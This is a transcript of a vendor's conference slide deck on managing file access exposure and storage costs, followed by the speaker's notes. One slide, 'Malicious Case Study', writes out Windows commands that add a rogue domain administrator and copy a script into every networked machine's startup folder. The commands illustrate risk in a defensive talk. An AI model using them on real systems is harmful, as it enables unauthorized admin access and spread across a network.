Back-up Solutions: Where to Cut Corners & Where Not To - Daniel Kimberlin, En...
Winning the war against data- Strategies to beat your arch nemesis: files - Gil Zimmerman, Aprigo
1. TM
Microsoft BizSpark
Startup of the Day!
Winning the war against data
Strategies to beat your arch nemesis: files.
Gil Zimmermann, CEO & Co-Founder
2. On-Premise & Cloud Data
(read: files)
Identify & Act
Access and Storage Control
4. Aprigo IT Benchmark
• SaaS offering
• Over 1,000 companies using Aprigo
• Over 750TBs under management
• Exposure at 95%
• Cost savings potential at 71%
• Installs in under 5 minutes
5. Data Deluge is a Problem
• Files exploding everywhere
• 75-90% of all data is unstructured (files)
• Valuable business asset
• Touched by everyone
• Vulnerable & exposed
• Expensive to manage
6. IT Owns the Data Problem
Data Deluge
Data Users
Compliance & Regulation
Business Data Dependence
=
IT Budgets
IT Headcount
No Mid-Market Solutions
~
∅
IT Fires
Exposure
Disruptio
n
Waste
7. Access Problem Math
• ACLs allow 13 different rights to access an object
• 12 practical combinations of ACE settings
• Permissions can be granted or denied
• 2^13*12 = 98,304 different access rights you can define
• Can be applied to a user/group to form an ACE,
unlimited number of ACEs can be combined into an ACL
• Each file/folder can be attached to a different ACL
• Millions of files, hundreds/thousands of users
• Business needs to know who has access to what
8. Access Best Practices
• Typical Exposure (95+%)
• Everyone (66%)
• Domain Users (45%)
• Explicit Permissions (92%)
• Don't over-organize your users, use inheritance
• Rogue Users
• Local Admins (99%)
• Outsiders are a new threat on Google Docs (98%)
• Talk in business terms (exposure, audit, risk, etc)
9. Access Use Cases
• IT Audits
• Help-Desk
• Active Directory Migrations
• IT GRC
• Data Breaches
• Data Forensics
• Entitlement Reporting
10. Capacity Best Practices
• Start with the obvious:
• Untouched in 90 days (81%)
• Media files (35%) vs. documents (16%)
• Large files over 100MBs (49%)
• Gets harder every time, so dig deeper
• Orphaned files (by owner)
• Small files that multiply
• Talk in business terms ($/GB, overhead, etc.)
11. Capacity Use Cases
• Disk Full
• Data Center Consolidation
• Data Migration
• Storage Refresh
• Backup/Replication Window Failure
• Chargeback
• Tiering
12. Storage Planning
• Understanding the data composition
• Capacity
• Cost (primary & secondary)
• Growth rate
• Ownership
• Data-intensive initiatives
• Reclaim costs by better utilization
13. Google Docs Best Practices
• Basic settings
• Enable/disable sharing
• Set up alerts for external sharing
• Hope for the best...
• Google Apps APIs
14. • Dashboard plugin
• Discover new shares on your network
• Network Share tab
• Preliminary access view
• Capacity utilization
• Available on any network share
• Find exposure & savings w/Aprigo NINJA
Spiceworks Integration
16. Innocent Case Study
• Bill the CFO owns the Finance share
• ACMESRVFinanceSecrets contains some of
the company’s most sensitive data
• Bill and his group have access
• ‘Domain Users’ is the default permission
• All employees have access
• Those with access can share...
17. Malicious Case Study
• BUILTINAdministrators
• 2 Line script to get to DOMAINAdministrators
• net user /domain /add rogueuser roguepass
• net group /domain "Domain Admins" /add rogueuser
• 1 more line to total network access
• for /F %%i in ('net view') do copy /Y %0 "%%ic$documents and
settingsall usersstart menuprogramsstartup"
19. Traditional Data Management
LAN
IT Environment
Server
NAS Appliances
(NetApp / EMC)
Windows
File ServersActive
Directory
Metadata
Collector
UI
Application
Servers
Analytics
Servers
Database
Servers
SAN
Network Shares
Web Services
AgentsAgents
AgentsAgents
AgentsAgents
20. SaaS Data Management
LAN
IT Environment
THE APRIGO SOLUTION (Single SIte)
Aprigo Back-End
(SAS70-II Data Center)
Web Services
Application
Servers
Analytics
Servers
Database
Servers
SAN
Encrypted
HTTPS Traffic
NAS Appliances
(NetApp / EMC)
Windows
File ServersActive
Directory Metadata
Collector
NINJA / UI
Network Shares
Spiceworld Session Topic: Winning the war against data- Strategies to beat your arch nemesis: files.
Ever get the feeling that data hates you? Despite the time, money and energy you put into storing and securing access to files, it’s a losing battle.
Users mock your efforts to use effective permissions
Files are copied, shared, moved and exposed
You run out of space on expensive storage and know that you’re storing junk you don’t need
In this talk, we’ll show how to save time, headaches, and money managing data access and optimizing storage on your network, the cloud, and in Spiceworks.
Customer Case Study examples throughout
Compelling Events throughout
Aprigo enables companies to visualize their on-premise and cloud based data (read: files) in a whole new way and immediately spot and act on access breaches and storage inefficiencies
Traditional Data Management implementation require:
Time
Costly to implement
Complex to set-up
Result: Many mid-size organizations were priced-out / prevented from using
With a hosted Data Management platform, the complexity is removed out of the environment and the value is delivered as a web service. This Reduces:
Time to Value
Cost of solution
complexity
It’s imported to note that for the use cases discussed so far, the Data Classification is done on meta-data only. The actual content of the data isn’t being scanned / transported outside the environment.
- Security - when choosing any hosted solution you want to make sure that:
SAS70-II Data Center
(Meta) Data is encrypted in transit and at rest